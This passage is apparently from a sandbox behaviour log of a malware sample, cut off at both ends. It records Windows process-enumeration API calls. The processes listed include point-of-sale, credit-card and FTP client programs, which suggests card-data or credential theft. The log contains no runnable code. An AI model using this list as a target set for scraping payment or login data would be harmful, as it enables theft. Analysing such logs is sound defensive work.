th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0100.511] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0100.511] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0100.512] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x994, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0100.513] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0100.513] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0100.514] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0100.515] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0100.515] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0100.516] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0100.517] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0100.518] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0100.518] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0100.519] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0100.520] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0100.520] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0100.538] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0100.539] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="numerous-worm-coding.exe")) returned 1 [0100.539] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0100.540] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="anadecadessrc.exe")) returned 1 [0100.540] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0100.541] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0100.541] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0100.542] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0100.543] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.543] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0100.544] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0100.544] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0100.545] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0100.545] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.546] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xeb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0100.548] Sleep (dwMilliseconds=0x64) [0100.646] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xec [0100.650] Process32FirstW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.651] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0100.651] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0100.652] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.652] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0100.653] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.653] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0100.654] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0100.654] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0100.655] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0100.655] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.656] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.656] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.657] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.657] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.658] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0100.658] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.658] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.659] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0100.659] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0100.660] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0100.660] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0100.663] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.663] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0100.664] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x580, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x364, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0100.664] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0100.665] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="chelsea.exe")) returned 1 [0100.665] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="temperature_lowest.exe")) returned 1 [0100.665] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="holmes rejected dividend.exe")) returned 1 [0100.666] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x728, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="enters.exe")) returned 1 [0100.666] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="championshipsmpegs.exe")) returned 1 [0100.667] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="alfred_both.exe")) returned 1 [0100.667] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="facilitatebranchesanymore.exe")) returned 1 [0100.668] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="releases.exe")) returned 1 [0100.668] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="mediterranean.exe")) returned 1 [0100.669] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="junk_ti.exe")) returned 1 [0100.669] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="gps_conduct_strips.exe")) returned 1 [0100.670] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="appealfaqcove.exe")) returned 1 [0100.670] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="generated.exe")) returned 1 [0100.671] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="nbaemotions.exe")) returned 1 [0100.671] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="cowdirector.exe")) returned 1 [0100.672] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="pill sri.exe")) returned 1 [0100.672] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightweight-yr.exe")) returned 1 [0100.673] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="somerset_concluded_twice.exe")) returned 1 [0100.673] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0100.674] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0100.674] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0100.674] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0100.675] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0100.675] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0100.676] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0100.676] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0100.677] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: 